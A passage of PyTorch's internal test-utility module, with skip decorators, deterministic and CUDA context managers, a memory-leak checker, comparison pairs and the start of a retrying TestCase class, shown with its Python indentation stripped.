raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
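# Hypothetical usage sketch for the decorator above (not part of the original
# file); the test name is made up:
#
#   @skipIfRocmVersionLessThan((4, 2))
#   def test_foo(self):
#       ...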
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
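# A minimal usage sketch for `DeterministicGuard` above (illustrative only;
# `some_op` is a hypothetical operation): run a block with deterministic
# algorithms enforced, restoring the previous setting afterwards.
#
#   with DeterministicGuard(True, warn_only=False):
#       out = some_op(inp)  # errors if a non-deterministic kernel is hit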
# Context manager for setting CUDA sync debug mode and resetting it
# to its original value.
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoXNNPACK(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch.backends.xnnpack.enabled:
raise unittest.SkipTest('XNNPACK must be enabled for these tests. Please build with USE_XNNPACK=1.')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
    This will check if 'MyOp' is registered in caffe2.python.core._REGISTERED_OPERATORS.
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def _decide_skip_caffe2(expect_caffe2, reason):
def skip_dec(func):
def wrapper(self):
if torch.onnx._CAFFE2_ATEN_FALLBACK != expect_caffe2:
raise unittest.SkipTest(reason)
return func(self)
return wrapper
return skip_dec
skipIfCaffe2 = _decide_skip_caffe2(False, "Not compatible with Caffe2")
skipIfNoCaffe2 = _decide_skip_caffe2(True, "Caffe2 is not available")
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
        if getattr(fn, '_do_cuda_memory_leak_check', True):  # if currently True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
        if getattr(fn, '_do_cuda_non_default_stream', True):  # if currently True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
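# Illustrative sketch for `freeze_rng_state` above (not part of the original
# file): two draws in separate frozen blocks see identical RNG state, and the
# global state is untouched afterwards.
#
#   with freeze_rng_state():
#       a = torch.rand(3)
#   with freeze_rng_state():
#       b = torch.rand(3)
#   # a and b are equal; the global RNG state is as it was before both blocks.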
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
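# Illustrative sketch for `set_default_dtype` above: temporarily change the
# default floating point dtype.
#
#   with set_default_dtype(torch.float64):
#       assert torch.tensor(1.0).dtype is torch.float64
#   # the previous default dtype is restored here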
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
    except TypeError:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
        # NOTE: driver API discrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
    print('Failed to import hypothesis in common_utils; tests are not derandomized')
# Used in check_if_enable to see if a test method should be disabled by an issue,
# sanitizes a test method name from appended suffixes by @dtypes parametrization.
# e.g., an issue with title "DISABLED test_bitwise_ops (__main__.TestBinaryUfuncs)" should
# disable ALL parametrized test_bitwise_ops tests, such as test_bitwise_ops_cuda_int32
def remove_device_and_dtype_suffixes(test_name: str) -> str:
# import statement is localized to avoid circular dependency issues with common_device_type.py
from torch.testing._internal.common_device_type import get_device_type_test_bases
device_suffixes = [x.device_type for x in get_device_type_test_bases()]
dtype_suffixes = [str(dt)[len("torch."):] for dt in get_all_dtypes()]
test_name_chunks = test_name.split("_")
if len(test_name_chunks) > 0 and test_name_chunks[-1] in dtype_suffixes:
if len(test_name_chunks) > 1 and test_name_chunks[-2] in device_suffixes:
return "_".join(test_name_chunks[0:-2])
return "_".join(test_name_chunks[0:-1])
return test_name
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
raw_test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and raw_test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
sanitized_test_method_name = remove_device_and_dtype_suffixes(test._testMethodName)
if not IS_SANDCASTLE and disabled_tests_dict is not None:
for disabled_test, (issue_url, platforms) in disabled_tests_dict.items():
disable_test_parts = disabled_test.split()
if len(disable_test_parts) > 1:
disabled_test_name = disable_test_parts[0]
disabled_test_suite = disable_test_parts[1][1:-1]
# if test method name or its sanitized version exactly matches the disabled test method name
# AND allow non-parametrized suite names to disable parametrized ones (TestSuite disables TestSuiteCPU)
if (test._testMethodName == disabled_test_name or sanitized_test_method_name == disabled_test_name) \
and disabled_test_suite in test_suite:
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
skip_msg = f"Test is disabled because an issue exists disabling it: {issue_url}" \
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " \
"If you're seeing this on your local machine and would like to enable this test, " \
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests."
raise unittest.SkipTest(skip_msg)
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# `TestCase.assertEqual` is very permissive and coerces the inputs into a format that can be compared. This is very
# convenient when writing tests, but not so much while reviewing them. By default, the comparison `Pair` framework of
# `torch.testing._comparison.assert_equal`, used for example by the public testing function
# `torch.testing.assert_close`, is more strict. In order to use the same framework and thus reduce the divergence
# between internal and external comparison logic as much as possible, we define some "relaxed" pairs here. They only
# change the supported inputs, but the comparison logic is the same.
# TODO: Revisit the relaxed pairs and check how much work it is to fix the tests that would fail without the relaxation.
class RelaxedBooleanPair(BooleanPair):
"""Pair for boolean-like inputs.
In contrast to the builtin :class:`BooleanPair`, this class also supports one input being a number or a single
element tensor-like.
"""
_supported_number_types = NumberPair(0, 0)._supported_types
def _process_inputs(self, actual, expected, *, id):
        # We require at least one of the inputs to be a boolean; the other can also be a boolean, a
        # number, or a single element tensor or array, whereas the default BooleanPair requires both inputs to be booleans.
tensor_or_array_types: Tuple[Type, ...] = (torch.Tensor, np.ndarray)
other_supported_types = (*self._supported_types, *self._supported_number_types, *tensor_or_array_types)
if not (
(isinstance(actual, self._supported_types) and isinstance(expected, other_supported_types))
or (isinstance(expected, self._supported_types) and isinstance(actual, other_supported_types))
):
raise UnsupportedInputs()
return [self._to_bool(input, id=id) for input in (actual, expected)]
def _to_bool(self, bool_like, *, id):
if isinstance(bool_like, np.number):
return bool(bool_like.item())
elif type(bool_like) in self._supported_number_types:
return bool(bool_like)
elif isinstance(bool_like, (torch.Tensor, np.ndarray)):
numel = bool_like.numel() if isinstance(bool_like, torch.Tensor) else bool_like.size
if numel > 1:
raise ErrorMeta(
ValueError,
f"Only single element tensor-likes can be compared against a boolean. "
f"Got {numel} elements instead.",
id=id,
)
return bool(bool_like.item())
else:
return super()._to_bool(bool_like, id=id)
class RelaxedNumberPair(NumberPair):
"""Pair for number-like inputs.
In contrast to the builtin :class:`NumberPair`, this class also supports one input being a single element
tensor-like or a :class:`enum.Enum`. (D)Type checks are disabled, meaning comparing 1 to 1.0 succeeds even when
``check_dtype=True`` is passed.
In addition, this class uses looser default tolerances for :class:`float` and :class:`complex` inputs. Also
supports overriding the absolute and relative tolerance through the ``@precisionOverride`` and
``@toleranceOverride`` decorators.
"""
_TYPE_TO_DTYPE = {
int: torch.int64,
float: torch.float32,
complex: torch.complex64,
}
def __init__(
self, actual, expected, *, rtol_override=0.0, atol_override=0.0, check_dtype=None, **other_parameters
) -> None:
super().__init__(actual, expected, check_dtype=False, **other_parameters)
self.rtol = max(self.rtol, rtol_override)
self.atol = max(self.atol, atol_override)
def _process_inputs(self, actual, expected, *, id):
        # We require at least one of the inputs to be a number; the other can also be a number or a single
        # element tensor or array, whereas the default NumberPair requires both inputs to be numbers.
tensor_or_array_types: Tuple[Type, ...] = (torch.Tensor, np.ndarray)
other_supported_types = (*self._supported_types, *tensor_or_array_types)
if not (
(isinstance(actual, self._supported_types) and isinstance(expected, other_supported_types))
or (isinstance(expected, self._supported_types) and isinstance(actual, other_supported_types))
):
raise UnsupportedInputs()
return [self._to_number(input, id=id) for input in (actual, expected)]
def _to_number(self, number_like, *, id):
if isinstance(number_like, (torch.Tensor, np.ndarray)):
numel = number_like.numel() if isinstance(number_like, torch.Tensor) else number_like.size
if numel > 1:
raise ErrorMeta(
ValueError,
f"Only single element tensor-likes can be compared against a number. "
f"Got {numel} elements instead.",
id=id,
)
number = number_like.item()
if isinstance(number, bool):
number = int(number)
return number
elif isinstance(number_like, Enum):
return int(number_like) # type: ignore[call-overload]
else:
return super()._to_number(number_like, id=id)
class TensorOrArrayPair(TensorLikePair):
"""Pair for tensor-like inputs.
On the one hand this class is stricter than the builtin :class:`TensorLikePair` since it only allows instances of
:class:`torch.Tensor` and :class:`numpy.ndarray` rather than allowing any tensor-like than can be converted into a
tensor. On the other hand this class is looser since it converts all inputs into tensors with no regard of their
relationship, e.g. comparing a :class:`torch.Tensor` to :class:`numpy.ndarray` is fine.
In addition, this class supports overriding the absolute and relative tolerance through the ``@precisionOverride``
and ``@toleranceOverride`` decorators.
"""
def __init__(self, actual, expected, *, rtol_override=0.0, atol_override=0.0, **other_parameters):
super().__init__(actual, expected, **other_parameters)
self.rtol = max(self.rtol, rtol_override)
self.atol = max(self.atol, atol_override)
def _process_inputs(self, actual, expected, *, id, allow_subclasses):
self._check_inputs_isinstance(actual, expected, cls=(torch.Tensor, np.ndarray))
actual, expected = [self._to_tensor(input) for input in (actual, expected)]
for tensor in (actual, expected):
self._check_supported(tensor, id=id)
return actual, expected
class UnittestPair(Pair):
"""Fallback ABC pair that handles non-numeric inputs.
To avoid recreating the mismatch messages of :meth:`unittest.TestCase.assertEqual`, this pair simply wraps it in
order to use it with the :class:`Pair` "framework" from :func:`assert_equal`.
Define the :attr:`UnittestPair.CLS` in a subclass to indicate which class(es) of the inputs the pair should support.
"""
CLS: Union[Type, Tuple[Type, ...]]
TYPE_NAME: Optional[str] = None
def __init__(self, actual, expected, **other_parameters):
self._check_inputs_isinstance(actual, expected, cls=self.CLS)
super().__init__(actual, expected, **other_parameters)
def compare(self):
test_case = unittest.TestCase()
try:
return test_case.assertEqual(self.actual, self.expected)
except test_case.failureException as error:
msg = str(error)
type_name = self.TYPE_NAME or (self.CLS if isinstance(self.CLS, type) else self.CLS[0]).__name__
raise self._make_error_meta(AssertionError, f"{type_name.title()} comparison failed: {msg}")
class StringPair(UnittestPair):
CLS = string_classes
TYPE_NAME = "string"
class SetPair(UnittestPair):
CLS = set
class TypePair(UnittestPair):
CLS = type
class ObjectPair(UnittestPair):
CLS = object
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
    # Checker to terminate the test suite early if an unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
            # A CUDA device-side error will cause subsequent test cases to fail.
            # Stop the entire test suite if a RuntimeError is caught during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
print("TEST SUITE EARLY TERMINATION due to torch.cuda.synchronize() failure", file=sys.stderr)
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
        # NOTE: Python Exceptions (e.g., unittest.Skip) keep objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
if result.wasSuccessful():
case = TestCase()
if TEST_SAVE_XML is not None:
                    # This is a bit hacky; XMLRunner modifies the expected type from TestCase to TestInfo
# Create dummy TestInfo to record results correctly
from xmlrunner.result import _TestInfo # type: ignore[import]
case = _TestInfo(result, case)
case.output = _TestInfo.ERROR
case.elapsed_time = 0.0
case.test_description = "TestSuiteEarlyFailure"
# This shouldn't really happen, but if does add fake failure
# For more details see https://github.com/pytorch/pytorch/issues/71973
result.failures.append((case, "TestSuite execution was aborted early"))
assert result.wasSuccessful() is False
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
with contextlib.ExitStack() as stack:
if TEST_WITH_CROSSREF:
stack.enter_context(torch.overrides.push_torch_function_mode(CrossRefMode))
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
